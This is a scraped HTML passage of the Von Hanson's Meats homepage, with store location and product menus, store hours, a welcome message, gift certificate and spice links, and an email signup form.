ubermenu-item-layout-text_only" href="https://vonhansons.com/savage/"><span class="ubermenu-target-title ubermenu-target-text">Savage</span></a></li><li id="menu-item-1469" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1469 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/shakopee/"><span class="ubermenu-target-title ubermenu-target-text">Shakopee</span></a></li><li id="menu-item-1470" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1470 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/st-cloud/"><span class="ubermenu-target-title ubermenu-target-text">St. Cloud</span></a></li><li id="menu-item-1471" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1471 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/st-paul/"><span class="ubermenu-target-title ubermenu-target-text">St. Paul</span></a></li><li id="menu-item-1472" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1472 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/woodbury/"><span class="ubermenu-target-title ubermenu-target-text">Woodbury</span></a></li></ul></li><li id="menu-item-1444" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-1444 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack" ><span class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only"><span class="ubermenu-target-title ubermenu-target-text">Arizona</span></span><ul class="ubermenu-submenu ubermenu-submenu-id-1444 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-1694" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-1694 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="http://vonhansonsmeats.net"><span class="ubermenu-target-title ubermenu-target-text">Chandler</span></a></li></ul></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fa fa-times"></i> Close</li></ul></li><li id="menu-item-1445" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-1445 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega ubermenu-disable-padding" ><span class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left ubermenu-noindicator ubermenu-item-notext" tabindex="0"><img class="ubermenu-image ubermenu-image-size-full" src="https://i1.wp.com/vonhansons.com/wp-content/uploads/2016/06/transpix.png?fit=1%2C1&amp;ssl=1" width="1" height="1" alt="transpix" /></span><ul class="ubermenu-submenu ubermenu-submenu-id-1445 ubermenu-submenu-type-auto ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-left_edge_item" ><li class=" ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-item-has-children ubermenu-item-1474 ubermenu-item-level-1 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-1474"><ul class="ubermenu-submenu ubermenu-submenu-id-1474 ubermenu-submenu-type-stack" ><li id="menu-item-1475" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1475 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/beef/"><span class="ubermenu-target-title ubermenu-target-text">Beef</span></a></li><li id="menu-item-1476" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1476 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/chicken/"><span class="ubermenu-target-title ubermenu-target-text">Chicken</span></a></li><li id="menu-item-1478" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1478 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/pork/"><span class="ubermenu-target-title ubermenu-target-text">Pork</span></a></li><li id="menu-item-1479" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1479 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/smokehouse/"><span class="ubermenu-target-title ubermenu-target-text">Smokehouse</span></a></li><li id="menu-item-1477" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1477 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/deli/"><span class="ubermenu-target-title ubermenu-target-text">Deli</span></a></li></ul></li><li class=" ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-item-has-children ubermenu-item-1480 ubermenu-item-level-1 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-1480"><ul class="ubermenu-submenu ubermenu-submenu-id-1480 ubermenu-submenu-type-stack" ><li id="menu-item-1481" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1481 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/bakery/"><span class="ubermenu-target-title ubermenu-target-text">Bakery</span></a></li><li id="menu-item-1482" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1482 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/bbq-headquarters/"><span class="ubermenu-target-title ubermenu-target-text">BBQ Headquarters</span></a></li><li id="menu-item-1484" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1484 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/miscellaneous/"><span class="ubermenu-target-title ubermenu-target-text">Miscellaneous</span></a></li><li id="menu-item-1483" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1483 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/bundles-and-variety-packs/"><span class="ubermenu-target-title ubermenu-target-text">Bundles and Variety Packs</span></a></li><li id="menu-item-2115" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-2115 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/gluten-free-products/"><span class="ubermenu-target-title ubermenu-target-text">Gluten FREE Items</span></a></li></ul></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fa fa-times"></i> Close</li></ul></li><li id="menu-item-1446" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-1446 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega ubermenu-disable-padding" ><span class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left ubermenu-noindicator ubermenu-item-notext" tabindex="0"><img class="ubermenu-image ubermenu-image-size-full" src="https://i1.wp.com/vonhansons.com/wp-content/uploads/2016/06/transpix.png?fit=1%2C1&amp;ssl=1" width="1" height="1" alt="transpix" /></span><ul class="ubermenu-submenu ubermenu-submenu-id-1446 ubermenu-submenu-type-auto ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-left_edge_item" ><li id="menu-item-1485" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1485 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/current-newspaper-insert/"><span class="ubermenu-target-title ubermenu-target-text">Current Newspaper Insert / Mailer</span></a></li><li id="menu-item-1486" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1486 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/monthly-specials/"><span class="ubermenu-target-title ubermenu-target-text">Online Coupons</span></a></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fa fa-times"></i> Close</li></ul></li><li id="menu-item-1447" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1447 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-disable-padding" ><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left ubermenu-item-notext" href="https://vonhansons.com/mvg-club/" tabindex="0"><img class="ubermenu-image ubermenu-image-size-full" src="https://i1.wp.com/vonhansons.com/wp-content/uploads/2016/06/transpix.png?fit=1%2C1&amp;ssl=1" width="1" height="1" alt="transpix" /></a></li><li id="menu-item-1448" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1448 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-disable-padding ubermenu-hide-mobile" ><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left ubermenu-item-notext" href="https://vonhansons.com/recipes/" tabindex="0"><img class="ubermenu-image ubermenu-image-size-full" src="https://i1.wp.com/vonhansons.com/wp-content/uploads/2016/06/transpix.png?fit=1%2C1&amp;ssl=1" width="1" height="1" alt="transpix" /></a></li></ul></nav> <!-- End UberMenu --> </div></div></div><div class="clear"></div> </div></div> <div id="bottomHeader"></div></div><div class="wrap"><div id="title-area"></div></div></div><div id="inner"><div id="content-sidebar-wrap"><div id="content" class="hfeed"><div class="post-6 page type-page status-publish hentry entry"><h1 class="entry-title">Welcome to Von Hanson&#8217;s Meats</h1> <div class="entry-content"><div class='mailmunch-forms-before-post' style='display: none !important;'></div> <div data-elementor-type="post" data-elementor-id="6" class="elementor elementor-6 elementor-bc-flex-widget" data-elementor-settings="[]"> <div class="elementor-inner"> <div class="elementor-section-wrap"> <section class="elementor-element elementor-element-5d661357 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="5d661357" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-449ccce9 elementor-column elementor-col-100 elementor-top-column" data-id="449ccce9" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-780e380 elementor-widget elementor-widget-image-carousel" data-id="780e380" data-element_type="widget" data-settings="{&quot;slides_to_show&quot;:&quot;1&quot;,&quot;autoplay_speed&quot;:3000,&quot;navigation&quot;:&quot;both&quot;,&quot;pause_on_hover&quot;:&quot;yes&quot;,&quot;autoplay&quot;:&quot;yes&quot;,&quot;infinite&quot;:&quot;yes&quot;,&quot;effect&quot;:&quot;slide&quot;,&quot;speed&quot;:500,&quot;direction&quot;:&quot;ltr&quot;}" data-widget_type="image-carousel.default"> <div class="elementor-widget-container"> <div class="elementor-image-carousel-wrapper elementor-slick-slider" dir="ltr"> <div class="elementor-image-carousel slick-arrows-inside slick-dots-outside slick-image-stretch"> <div class="slick-slide"><figure class="slick-slide-inner"><img class="slick-slide-image" src="https://i0.wp.com/vonhansons.com/wp-content/uploads/2016/06/Sausage.jpg?fit=580%2C435&amp;ssl=1" alt="Sausage" /></figure></div><div class="slick-slide"><figure class="slick-slide-inner"><img class="slick-slide-image" src="https://i2.wp.com/vonhansons.com/wp-content/uploads/2016/06/MeatCheese-web.jpg?fit=580%2C435&amp;ssl=1" alt="MeatCheese-web" /></figure></div><div class="slick-slide"><figure class="slick-slide-inner"><img class="slick-slide-image" src="https://i0.wp.com/vonhansons.com/wp-content/uploads/2016/06/Employees-web.jpg?fit=580%2C435&amp;ssl=1" alt="Employees-web" /></figure></div><div class="slick-slide"><figure class="slick-slide-inner"><img class="slick-slide-image" src="https://i2.wp.com/vonhansons.com/wp-content/uploads/2016/06/BoarsHead-with-Emp_web.jpg?fit=580%2C435&amp;ssl=1" alt="BoarsHead-with-Emp_web" /></figure></div><div class="slick-slide"><figure class="slick-slide-inner"><img class="slick-slide-image" src="https://i0.wp.com/vonhansons.com/wp-content/uploads/2016/06/DeliCaseweb.jpg?fit=580%2C435&amp;ssl=1" alt="DeliCaseweb" /></figure></div><div class="slick-slide"><figure class="slick-slide-inner"><img class="slick-slide-image" src="https://i2.wp.com/vonhansons.com/wp-content/uploads/2016/06/ChickenKabobs-web.jpg?fit=580%2C435&amp;ssl=1" alt="ChickenKabobs-web" /></figure></div> </div> </div> </div> </div> <div class="elementor-element elementor-element-4a510a24 elementor-widget elementor-widget-text-editor" data-id="4a510a24" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h4 class="cta" style="text-align: center;"><strong>Store Hours: M to F: 9 &#8211; 8,  Sat: 8 &#8211; 7 &amp; Sun: 10 &#8211; 6</strong></h4><p>At Von Hanson&#8217;s, we strive to deliver personalized full service, in a friendly old-fashioned meat market environment. Promising our customers that, &#8220;<em>We give you the Best</em>&#8220;, the difference is in our quality. Along with this promise, we offer a large and ever expanding selection of meat products and menu ideas ranging from casual gatherings to special occasions.</p><h2 class="cta" style="text-align: center;"><span style="color: #993300;">Our goal at Von Hanson&#8217;s is to &#8216;meat&#8217; the needs of every customer.</span></h2></div> </div> </div> <div class="elementor-element elementor-element-facdc21 elementor-widget elementor-widget-spacer" data-id="facdc21" data-element_type="widget" data-widget_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-17a2044 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="17a2044" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-73b5e11 elementor-column elementor-col-100 elementor-top-column" data-id="73b5e11" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-f1356f1 elementor-widget elementor-widget-heading" data-id="f1356f1" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">ORDER GIFT CERTIFICATES / SPECIAL SPICE ON-LINE</h2> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-21677fd elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="21677fd" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-799f9f1 elementor-column elementor-col-100 elementor-top-column" data-id="799f9f1" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <section class="elementor-element elementor-element-28efce5 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-id="28efce5" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-ffd2c9c elementor-column elementor-col-50 elementor-inner-column" data-id="ffd2c9c" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-f4ce9f9 elementor-widget elementor-widget-spacer" data-id="f4ce9f9" data-element_type="widget" data-widget_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> <div class="elementor-element elementor-element-df31c55 elementor-widget elementor-widget-image" data-id="df31c55" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <a href="/gift-certificate" data-elementor-open-lightbox="" target="_blank"> <img width="300" height="209" src="https://i2.wp.com/vonhansons.com/wp-content/uploads/2018/10/GiftCert-VHArt-01-e1540436055487.png?fit=300%2C209&amp;ssl=1" class="attachment-woocommerce_single size-woocommerce_single jetpack-lazy-image" alt="" data-lazy-src="https://i2.wp.com/vonhansons.com/wp-content/uploads/2018/10/GiftCert-VHArt-01-e1540436055487.png?fit=300%2C209&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64, R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /> </a> </div> </div> </div> <div class="elementor-element elementor-element-8ff7961 elementor-widget elementor-widget-spacer" data-id="8ff7961" data-element_type="widget" data-widget_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> <div class="elementor-element elementor-element-4fcc612 elementor-widget elementor-widget-heading" data-id="4fcc612" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default"><a href="/gift-certificate">Gift Certificates</a></h3> </div> </div> </div> </div> </div> <div class="elementor-element elementor-element-7b89956 elementor-column elementor-col-50 elementor-inner-column" data-id="7b89956" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-67b7df1 elementor-widget elementor-widget-image" data-id="67b7df1" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <a href="/product/special-spice/" data-elementor-open-lightbox="" target="_blank"> <img src="https://i0.wp.com/vonhansons.com/wp-content/uploads/2018/10/VH-Special-Spice.jpg?fit=100%2C200&amp;ssl=1" title="VH-Special-Spice.jpg" alt="VH-Special-Spice.jpg" /> </a> </div> </div> </div> <div class="elementor-element elementor-element-c30e78c elementor-widget elementor-widget-heading" data-id="c30e78c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default"><a href="/product/special-spice/">Special Spice</a></h3> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-def76de elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="def76de" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-f35bcd6 elementor-column elementor-col-100 elementor-top-column" data-id="f35bcd6" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-b3a5b04 bew-menu-cart-buttons-inline elementor-widget elementor-widget-bew-woo-menu-cart" data-id="b3a5b04" data-element_type="widget" data-widget_type="bew-woo-menu-cart.default"> <div class="elementor-widget-container"> <div class="bew-menu-cart"> <div class="woo-header-cart woo-arrow" data-icon="fa fa-shopping-cart" data-type="square"> <a class="woo-menucart square" href=" https://vonhansons.com/cart/" title="View your shopping cart"> <i class="fa fa-shopping-cart"></i> <span class="woo-cart-quantity square">0</span> </a> </div> <div class="bew-mini-cart bew-mini-cart-dropdown"> <div class="cart-dropdown shopping-cart "> <div class="shopping-cart-content"> <p class="woocommerce-mini-cart__empty-message">No products in the cart.</p> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-3031cc4 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="3031cc4" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-aec6d69 elementor-column elementor-col-100 elementor-top-column" data-id="aec6d69" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-160109e elementor-widget elementor-widget-divider" data-id="160109e" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> <div class="elementor-element elementor-element-ca0be11 elementor-widget elementor-widget-text-editor" data-id="ca0be11" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h4 style="text-align: center;"><div class="gca-utility vertical-spacer"></div></h4><h4 style="text-align: center;">Like Von Hanson&#8217;s on Facebook! <div class="sfsi_plus_widget sfsi_plus_shortcode_container"><div id="sfsi_plus_wDiv"></div><div class="sfsiplus_norm_row sfsi_plus_wDiv" style="width:225px;text-align:center;position:absolute;"><div style='width:40px; height:40px;margin-left:5px;margin-bottom:5px;' class='sfsi_plus_wicons shuffeldiv '><div class='sfsiplus_inerCnt'><a class=' sficn' data-effect='' target='_blank' href='https://www.facebook.com/likeVonHansons/' style='opacity:1' ><img alt="Facebook" title="Facebook" src="https://i0.wp.com/vonhansons.com/wp-content/plugins/Ultimate-Premium-Plugin/images/icons_theme/default/default_fb.png?ssl=1" height="40" width="40" style class="sfcm sfsi_wicon jetpack-lazy-image" data-effect data-lazy-src="https://i0.wp.com/vonhansons.com/wp-content/plugins/Ultimate-Premium-Plugin/images/icons_theme/default/default_fb.png?resize=40%2C40&#038;ssl=1" srcset="data:image/gif;base64, R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-recalc-dims="1"><noscript><img alt='Facebook' title='Facebook' src='https://i0.wp.com/vonhansons.com/wp-content/plugins/Ultimate-Premium-Plugin/images/icons_theme/default/default_fb.png?resize=40%2C40&#038;ssl=1' height='40' width='40' style='' class='sfcm sfsi_wicon' data-effect='' data-recalc-dims="1" /></noscript></a></div></div></div ><div id="sfsi_holder" class="sfsi_plus_holders" style="position: relative; float: left;width:100%;z-index:-1;"></div ><script>jQuery(".sfsi_plus_widget").each(function( index ) { if(jQuery(this).attr("data-position") == "widget") { var wdgt_hght = jQuery(this).children(".sfsiplus_norm_row.sfsi_plus_wDiv").height(); var title_hght = jQuery(this).parent(".widget.sfsi_plus").children(".widget-title").height(); var totl_hght = parseInt( title_hght ) + parseInt( wdgt_hght ); jQuery(this).parent(".widget.sfsi_plus").css("min-height", totl_hght+"px"); } });</script><div style="clear: both;"></div></div></h4><h4 style="text-align: center;"><div class="gca-utility vertical-spacer"></div></h4><p style="text-align: center;"><strong>We are a CSA Pick-Up Location</strong></p><div class='mailmunch-forms-in-post-middle' style='display: none !important;'></div><p style="text-align: center;"><a href="https://i1.wp.com/vonhansons.com/wp-content/uploads/2017/06/simpul_pahls1-e1525134288449.png"><img class="aligncenter wp-image-2126 size-full jetpack-lazy-image" src="https://i1.wp.com/vonhansons.com/wp-content/uploads/2017/06/simpul_pahls1-e1525134288449.png?resize=120%2C78" alt="simpul_pahls1" width="120" height="78" data-recalc-dims="1" data-lazy-src="https://i1.wp.com/vonhansons.com/wp-content/uploads/2017/06/simpul_pahls1-e1525134288449.png?resize=120%2C78&amp;is-pending-load=1" srcset="data:image/gif;base64, R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"><noscript><img class="aligncenter wp-image-2126 size-full" src="https://i1.wp.com/vonhansons.com/wp-content/uploads/2017/06/simpul_pahls1-e1525134288449.png?resize=120%2C78" alt="simpul_pahls1" width="120" height="78" data-recalc-dims="1" /></noscript></a></p></div> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </p><div class='mailmunch-forms-after-post' style='display: none !important;'></div></div></div></div><div id="sidebar" class="sidebar widget-area"><div id="text-23" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><!-- BEGIN: Constant Contact Bubble Opt-in Email List Form --> <div style="padding:5px; text-align:center;"> <img src="/wp-content/uploads/2011/02/MVG_VonHansons-web_updt_small.png" width="125" height="92" border="0" align="middle" data-lazy-src="/wp-content/uploads/2011/02/MVG_VonHansons-web_updt_small.png?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class=" jetpack-lazy-image"><noscript><img src="/wp-content/uploads/2011/02/MVG_VonHansons-web_updt_small.png" width="125" height="92" border="0" align="middle" /></noscript> <form name="ccoptin" action="http://visitor.constantcontact.com/d.jsp" target="_blank" method="post" style="margin: 15px 0;"> <font style="font-weight: bold; font-family:Arial; font-size:18px; color:#000000; line-height:1em;">Sign Up to Receive<br />Our Specials</font><br> <font style="font-weight: normal; font-family:Arial; font-size:10px; color:#000000;">Email:</font> <input type="text" name="ea" size="14" value="" style="margin-bottom:10px; padding: 7px; font-family: Arial; font-size:12px; border:1px solid #999999;">&nbsp;<input type="submit" name="go" value="Sign Up" class="submit" style="width: 70%; font-family:Arial,Helvetica,sans-serif; font-size:14px;"> <input type="hidden" name="m" value="1102645146288"> <input type="hidden" name="p" value="oi"> </form> <!-- END: Constant Contact Bubble Opt-in Email List Form --> <!-- BEGIN: SafeSubscribe --> <p><a href="http://www.constantcontact.com/safesubscribe.jsp" target="_blank"><img src="/wp-content/themes/thesis_18/custom/images/components/safe_subscribe_logo1.jpg" border="0" width="168" height="14" alt data-lazy-src="/wp-content/themes/thesis_18/custom/images/components/safe_subscribe_logo1.jpg?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class=" jetpack-lazy-image"><noscript><img src="/wp-content/themes/thesis_18/custom/images/components/safe_subscribe_logo1.jpg" border="0" width="168" height="14" alt=""/></noscript></a></p> <!-- END: SafeSubscribe --></div></div> </div></div> <div id="text-18" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><div style="width:100%; text-align:center;"> <a href="/catering/"><img src="/wp- content/uploads/2016/06/VHcateringbutton-4.png" data-lazy-src="/wp-content/uploads/2016/06/VHcateringbutton-4.png?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class=" jetpack-lazy-image"><noscript><img src="/wp- content/uploads/2016/06/VHcateringbutton-4.png" /></noscript><br /> </a> </div> </div> </div></div> <div id="nav_menu-3" class="widget widget_nav_menu"><div class="widget-wrap"><div class="menu-sidebar-container"><ul id="menu-sidebar" class="menu"><li id="menu-item-1390" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1390"><a href="https://vonhansons.com/about-von-hansons/">About Von Hanson&#8217;s</a> <ul class="sub-menu"> <li id="menu-item-1391" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1391"><a href="https://vonhansons.com/our-history/">Our History</a></li> <li id="menu-item-1392" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1392"><a href="https://vonhansons.com/philosophy/">Philosophy</a></li> <li id="menu-item-1393" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1393"><a href="https://vonhansons.com/community-involvement/">Community Involvement &#038; Fundraising</a></li> <li id="menu-item-1394" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1394"><a href="https://vonhansons.com/testimonials/">Testimonials</a></li> <li id="menu-item-1395" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1395"><a href="https://vonhansons.com/timeline-chart/">Timeline Chart</a></li> </ul> </li> <li id="menu-item-1396" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1396"><a href="https://vonhansons.com/services/">Services</a> <ul class="sub-menu"> <li id="menu-item-1397" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1397"><a href="https://vonhansons.com/wild-game-processing/">Wild Game Processing</a></li> <li id="menu-item-1398" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1398"><a href="https://vonhansons.com/wild-game-sausage/">Wild Game Sausage</a></li> <li id="menu-item-1404" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1404"><a href="https://vonhansons.com/drop-off-times-dates-locations/">Wild Game Drop Off Times, Dates, Locations</a></li> <li id="menu-item-1407" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1407"><a href="https://vonhansons.com/catering/">Catering</a></li> </ul> </li> <li id="menu-item-1399" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1399"><a href="https://vonhansons.com/contact-us/">Contact Us</a></li> </ul></div></div></div> </div></div> <div style="clear:both;"></div> </div> <div id="siteLinkPanel"> <div id="text-3" 